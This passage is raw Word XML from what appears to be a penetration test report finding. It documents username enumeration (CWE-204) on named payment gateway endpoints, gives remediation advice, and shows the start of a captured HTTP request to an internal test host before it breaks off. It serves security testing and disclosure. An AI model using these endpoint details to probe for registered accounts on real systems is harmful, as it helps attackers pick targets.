              <w:t>CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C862BAF" w14:textId="5BD1A7D4" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="002B7238">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:anchor="CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" w:history="1">
              <w:r w:rsidR="009208B5" w:rsidRPr="000976CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>6.5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="713AA242" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31AF6AC9" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31A06475" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-204: Response Discrepancy Information Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="53CED14D" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="716FC24C" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677DD56B" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/paymentgateway/loginservices/v1/gbd/account/validateRegisterUserDetails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12AF6B1A" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>changePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="617154CB" w14:textId="6EAC7705" w:rsidR="009208B5" w:rsidRPr="00397EF0" w:rsidRDefault="009208B5" w:rsidP="002B7238">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gofundhip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/secure/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/payments/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C09">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>updateMember</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="090AA06B" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="404063D8" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="01432C64" w14:textId="18C86BEC" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The software provides different responses to incoming requests in a way that allows an actor to determine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> if usernames or other sensitive data is currently registered with the application. This can be accomplished with the functionality found in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>validateRegisterUserDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002947B7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002947B7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>updateMember</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005650DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>changePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="28CF2411" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B8E32A" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AEFB3BE" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B7ABD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensure that error messages </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">and HTTP responses </w:t>
            </w:r>
            <w:r w:rsidRPr="009B7ABD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="4D8CB354" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2DA761D0" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="096046E7" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="1AA854F6" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C88C30" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A33B90">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>validateRegisterUserDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A33B90">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB6CBC8" w14:textId="77777777" w:rsidR="002B7238" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Functionality used for registering for a new account validates if a username, email, or phone number is currently enrolled. If the information exist in the database, an error message is presented to the user stating that the information is already stored. This allows an attacker to determine potential targets for attack. Production of the error message is present in the below image and HTTP request &amp; response. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B46FEE" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A33B90">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7238" w:rsidRPr="00A33B90" w14:paraId="2834EF85" w14:textId="77777777" w:rsidTr="002B7238">
              <w:trPr>
                <w:trHeight w:val="2330"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="7D36C0BE" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /paymentgateway/loginservices/v1/gbd/account/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>validateRegisterUserDetails</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="388D3D93" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1D7FF052" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="50332AF1" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="56033F62" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55A378A7" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00A33B90" w:rsidRDefault="002B7238" w:rsidP="002B7238">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A33B90">
                    <w:rPr>
